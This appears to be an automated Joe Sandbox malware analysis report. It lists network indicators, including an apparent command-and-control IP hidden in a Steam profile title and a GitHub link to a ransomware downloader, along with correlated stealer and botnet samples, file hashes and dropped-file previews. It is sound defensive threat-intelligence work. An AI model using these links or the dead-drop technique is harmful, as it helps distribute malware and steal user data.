https://help.steampowered.com/en/ | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | false | high
https://steamcommunity.com/profiles/76561199804377619tlq | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp | false | high
https://steamcommunity.com/market/ | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | false | high
https://store.steampowered.com/news/ | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | false | high
https://contoso.com/License | powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp | false | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
37.27.43.98 | unknown | Iran (ISLAMIC Republic Of) | 39232 | UNINETAZ | false
20.233.83.145 | github.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
185.199.110.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579768
Start date and time: 2024-12-23 08:50:42 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: YYjRtxS70h.exe
renamed because original name is a hash value
Original Sample Name: 5a59ce92b07de68c0be8fbd7944214e2.exe
Detection: MAL
Classification: mal88.evad.winEXE@21/24@4/5
                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                  • Number of executed functions: 239
                                                                                                                                                                                                                  • Number of non-executed functions: 26
                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 2616 because it is empty
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 3576 because it is empty
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 5608 because it is empty
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 6872 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:51:52 | API Interceptor | 31x Sleep call for process: powershell.exe modified
02:52:11 | API Interceptor | 53x Sleep call for process: YYjRtxS70h.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.102.49.254 | r4xiHKy8aM.exe | malicious | Socks5Systemz | /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254 | http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown | www.valvesoftware.com/legal.htm
37.27.43.98 | 7VfKPMdmiX.exe | malicious | Unknown |
37.27.43.98 | 7VfKPMdmiX.exe | malicious | Unknown |
20.233.83.145 | Y5kEUsYDFr.exe | malicious | Unknown | github.com/keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
raw.githubusercontent.com | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.199.110.133
raw.githubusercontent.com | Navan - Itinerary.pdf.scr.exe | malicious | LummaC | 185.199.110.133
raw.githubusercontent.com | BigProject.exe | malicious | LummaC | 185.199.110.133
raw.githubusercontent.com | Set-up!.exe | malicious | LummaC | 185.199.108.133
raw.githubusercontent.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 185.199.108.133
raw.githubusercontent.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 185.199.111.133
raw.githubusercontent.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 185.199.108.133
raw.githubusercontent.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 185.199.110.133
raw.githubusercontent.com | 58VSNPxrI4.exe | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT | 185.199.110.133
github.com | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 20.233.83.145
github.com | ORDER-241221K6890PF57682456POC7893789097393.j.jar | malicious | Caesium Obfuscator, STRRAT | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 20.233.83.145
github.com | 58VSNPxrI4.exe | malicious | Unknown | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT | 20.233.83.145
github.com | ep_setup.exe | malicious | Unknown | 20.233.83.145
steamcommunity.com | mgEXk8ip26.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | 44EPDJT1V8.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | Bire1g8ahY.exe | malicious | LummaC, Stealc | 104.102.49.254
steamcommunity.com | jSFUzuYPG9.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | HK8IIasL9i.exe | malicious | LummaC |
                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                      OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                      NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                      pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                      5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                      xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      UNINETAZnshmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 37.27.50.214
                                                                                                                                                                                                                      nshmpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 37.27.50.208
                                                                                                                                                                                                                      7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 37.27.43.98
                                                                                                                                                                                                                      7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 37.27.43.98
                                                                                                                                                                                                                      sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 37.26.35.119
                                                                                                                                                                                                                      powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                      • 37.27.238.92
                                                                                                                                                                                                                      PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                      • 37.27.123.72
                                                                                                                                                                                                                      exe009.exeGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                                      • 185.80.172.199
                                                                                                                                                                                                                      PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                      • 37.27.123.72
                                                                                                                                                                                                                      ________.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                      • 37.27.123.72
                                                                                                                                                                                                                      AKAMAI-ASUSmgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      44EPDJT1V8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 23.222.144.153
                                                                                                                                                                                                                      loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 104.72.108.202
                                                                                                                                                                                                                      loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 23.79.17.106
                                                                                                                                                                                                                      arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                      • 23.217.44.145
                                                                                                                                                                                                                      mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                      • 23.57.209.219
                                                                                                                                                                                                                      m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                      • 104.119.158.106
                                                                                                                                                                                                                      MICROSOFT-CORP-MSN-AS-BLOCKUSClient-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                      • 20.107.53.25
                                                                                                                                                                                                                      armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 40.112.151.235
                                                                                                                                                                                                                      gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                      • 204.79.197.219
                                                                                                                                                                                                                      trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                      • 204.79.197.219
                                                                                                                                                                                                                      armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 20.202.12.183
                                                                                                                                                                                                                      2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 20.78.208.111
                                                                                                                                                                                                                      loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 20.208.252.17
                                                                                                                                                                                                                      loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 20.234.251.100
                                                                                                                                                                                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                      • 21.152.225.5
                                                                                                                                                                                                                      arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                      • 40.113.41.15
                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0enTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
  • 104.102.49.254
  • 149.154.167.99
lKin1m7Pf2.lnk | malicious | Unknown
  • 104.102.49.254
  • 149.154.167.99
uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar
  • 104.102.49.254
  • 149.154.167.99
gVKsiQIHqe.exe | malicious | Vidar
  • 104.102.49.254
  • 149.154.167.99
Rokadernes.vbs | malicious | Remcos, GuLoader
  • 104.102.49.254
  • 149.154.167.99
trZG6pItZj.exe | malicious | Vidar
  • 104.102.49.254
  • 149.154.167.99
9EI7wrGs4K.exe | malicious | Vidar
  • 104.102.49.254
  • 149.154.167.99

Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Ttok18.exe | malicious | Vidar
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\YYjRtxS70h.exe
                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                        Size (bytes):1058
                                                                                                                                                                                                                        Entropy (8bit):5.356262093008712
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
                                                                                                                                                                                                                        MD5:B2EFBF032531DD2913F648E75696B0FD
                                                                                                                                                                                                                        SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
                                                                                                                                                                                                                        SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
                                                                                                                                                                                                                        SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                                                                                                                                                                                                                        Process:C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe
                                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3254)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):35590
                                                                                                                                                                                                                        Entropy (8bit):5.369516523910706
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:25pq/Ku4fmBC5ReOpqwczzQlFDaXfsW9l+X9hJYFn5OMF5CBHxaXfsW9l+X9hJYp:258/Ku4fmBC5ReOpqVaDaXfsW9l+X9hU
                                                                                                                                                                                                                        MD5:59CCD711F973D1DFEE4EA4A63982DDA0
                                                                                                                                                                                                                        SHA1:016FF421194218E9827A0A71A870B3A12A98351B
                                                                                                                                                                                                                        SHA-256:09C585F6464356DD296DE9585EF3CCCF0F2475ADE542656E5041AE9BE0D064FA
                                                                                                                                                                                                                        SHA-512:FBEBCD6958D0484A48DE0B074E06B68E45990CA2C7F2D7F96CE8491C22D7DE652EC8B783076ED8358F38FC32E5E8AE3050167792E761832A45B09C78DDE5AE37
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: p1up1 https://37.27.43.98|</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LX
                                                                                                                                                                                                                        Process:C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe
                                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3254)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):35590
                                                                                                                                                                                                                        Entropy (8bit):5.369516369908107
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:25pq/Ku4fmBC5ReOpqwczzQlFDaXfsW9l+X9hJYFn5OMF5CBHxaXfsW9l+X9hJYl:258/Ku4fmBC5ReOpqVaDaXfsW9l+X9hI
                                                                                                                                                                                                                        MD5:EC02A148AB42B542663D918C619429C6
                                                                                                                                                                                                                        SHA1:49B3118223BD91B3ABAFADA8A4B523E5E0559FCE
                                                                                                                                                                                                                        SHA-256:78D3702AC5E051FBE48DB1509EA83B96CFE4219BC0630F6788C243AAB4436F66
                                                                                                                                                                                                                        SHA-512:D8B10AD18D1B0197F909D719E3FDAFD042435F07A1C10C0D6B8D7437C8D20AEEEE994C1DAC191AA6811A983C356B2D662B9C3329B40A7DE490859749D58DE7ED
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: p1up1 https://37.27.43.98|</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LX
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:@...e...........................................................
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
